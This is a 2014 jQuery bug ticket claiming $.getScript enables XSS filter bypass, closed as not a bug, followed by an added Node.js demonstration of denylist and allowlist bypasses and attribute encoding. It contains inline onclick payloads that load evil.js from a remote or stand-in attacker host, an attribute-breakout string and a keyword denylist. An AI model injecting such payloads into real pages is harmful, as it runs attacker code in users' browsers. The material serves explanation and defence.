#15166 closed bug (notabug)
Opened June 25, 2014 08:12AM UTC
Closed June 25, 2014 01:20PM UTC
$.getScript Function may cause XSS attack
| Reported by: | lupin | Owned by: | |
|---|---|---|---|
| Priority: | high | Milestone: | None |
| Component: | ajax | Version: | 1.11.1 |
| Keywords: | getScript | Cc: | |
| Blocked by: | | Blocking: | |
Description
$.getScript can load a JavaScript file from a remote server, then execute it.
In some cases, if an attacker can control this function or its parameter, this function may cause an XSS attack.
For example, if an attacker can control an HTML tag (such as an input tag):
<input type=text onclick=...>
An attacker can control the onclick event, but the web app filters evil characters (<script>, document, ...). In this case XSS cannot occur, but if the web page contains the jQuery library, the attacker can bypass the filter mechanism using the $.getScript function, like this:
<input type=text onclick=$.getScript('http://jquery.com/evil.js')>
The attacker puts evil.js on his remote server; this JavaScript file contains evil JavaScript code. When a user clicks the input tag, the evil JavaScript code will execute.
I think the jQuery library should add a white list: a web page can only load a JavaScript file from the current domain by default, and if a web page needs to load a JavaScript file from a remote server, the developer has to add the domain to the white list.
Attachments (0)
Change History (1)
Changed June 25, 2014 01:20PM UTC by comment:1
| resolution: | → notabug |
|---|---|
| status: | new → closed |
This is an "airtight hatchway" problem. If an attacker has the ability to run $.getScript they can run any script. If an attacker has the ability to inject arbitrary HTML in some way then the developer has made a mistake already. Wouldn't the onclick attribute just add itself to the whitelist before calling $.getScript then?

Sorry, but $.getScript is intended to get scripts, including ones from other origins. It's done that for years. We can't add hurdles that would break a lot of existing code to
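An added example, not code from this ticket or from the jQuery project, that models both sides of the exchange above in plain Node.js with no DOM. Part 1 is the kind of keyword denylist the report describes, which the $.getScript call slips past. Part 2 is a hypothetical client-side origin allowlist of the sort the report asks for, together with a stub standing in for jQuery's getScript; it shows the reply's point that an inline handler can simply add its own origin before calling the function. Part 3 is the application-side fix the reply alludes to: encoding untrusted text for the attribute context it lands in, so it never becomes an onclick handler at all. The attacker.example host, the scriptOrigins set, guardedGetScript and all payload strings are constructed for the demonstration.

```javascript
// Added example, not code from the jQuery ticket or the jQuery project.
// Runs under Node.js without a DOM.  jQuery's getScript is replaced by a
// stub, and every URL, host name and payload below is constructed for the demo.

// 1. The kind of keyword denylist the report describes.  It catches "<script"
//    and "document" but knows nothing about helper functions a page ships.
const BLOCKED_TOKENS = ["<script", "document", "javascript:"];

function denylistFilter(value) {
  const lower = String(value).toLowerCase();
  return BLOCKED_TOKENS.some((token) => lower.includes(token));
}

// Attacker-controlled handler text, as in the report (constructed host).
const EVIL_URL = "https://attacker.example/evil.js";
const GETSCRIPT_PAYLOAD = `$.getScript('${EVIL_URL}')`;

// The report's bypass: the payload contains none of the blocked tokens.
function payloadPassesDenylist(payload) {
  return !denylistFilter(payload);
}

// 2. A hypothetical origin allowlist of the kind the report asks for.  It is
//    ordinary page state, so an inline handler can extend it before loading.
const scriptOrigins = new Set(["https://app.example"]);

function guardedGetScript(url, allowlist, loaded) {
  const origin = new URL(url).origin;
  if (!allowlist.has(origin)) {
    return false; // refused: origin not on the list
  }
  loaded.push(url); // stand-in for jQuery fetching and executing the script
  return true;
}

// Models the browser evaluating an onclick attribute: the handler body runs
// with the same access to page state (passed explicitly here) as the app.
function runInlineHandler(handlerCode, allowlist, loaded) {
  const $ = { getScript: (url) => guardedGetScript(url, allowlist, loaded) };
  const handler = new Function("scriptOrigins", "$", handlerCode);
  handler(allowlist, $);
  return loaded;
}

const ALLOWLIST_BYPASS_PAYLOAD =
  `scriptOrigins.add('${new URL(EVIL_URL).origin}'); ${GETSCRIPT_PAYLOAD};`;

// Without mutation the allowlist does refuse the foreign origin...
function allowlistBlocksUnmutated() {
  const loaded = runInlineHandler(GETSCRIPT_PAYLOAD + ";", new Set(scriptOrigins), []);
  return loaded.length === 0;
}

// ...but a handler that adds its own origin first gets the script loaded anyway.
function allowlistIsBypassed() {
  const loaded = runInlineHandler(ALLOWLIST_BYPASS_PAYLOAD, new Set(scriptOrigins), []);
  return loaded.includes(EVIL_URL);
}

// 3. The application-side fix: untrusted data never goes into an event-handler
//    attribute, and in an ordinary attribute it is encoded for that context.
function encodeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderTextInput(untrustedValue) {
  return `<input type="text" value="${encodeAttr(untrustedValue)}">`;
}

// A breakout attempt that tries to close the value and start an onclick.
const BREAKOUT_PAYLOAD = `" onclick="${GETSCRIPT_PAYLOAD}`;

function breakoutIsNeutralised() {
  const html = renderTextInput(BREAKOUT_PAYLOAD);
  const start = html.indexOf('value="') + 'value="'.length;
  const inner = html.slice(start, html.lastIndexOf('">'));
  // No raw quote or angle bracket survives inside the attribute value, so the
  // element still has exactly the two attributes we wrote: the payload is data.
  return !inner.includes('"') && !inner.includes("<");
}
```

Run it with node; each step returns a boolean so the outcome can be checked rather than read off the console. The third part is the practical lesson: the filter is the wrong layer. Once attacker text reaches an attribute unencoded, the attacker is already executing code in the page, and no library-side check on where further scripts come from can take that back.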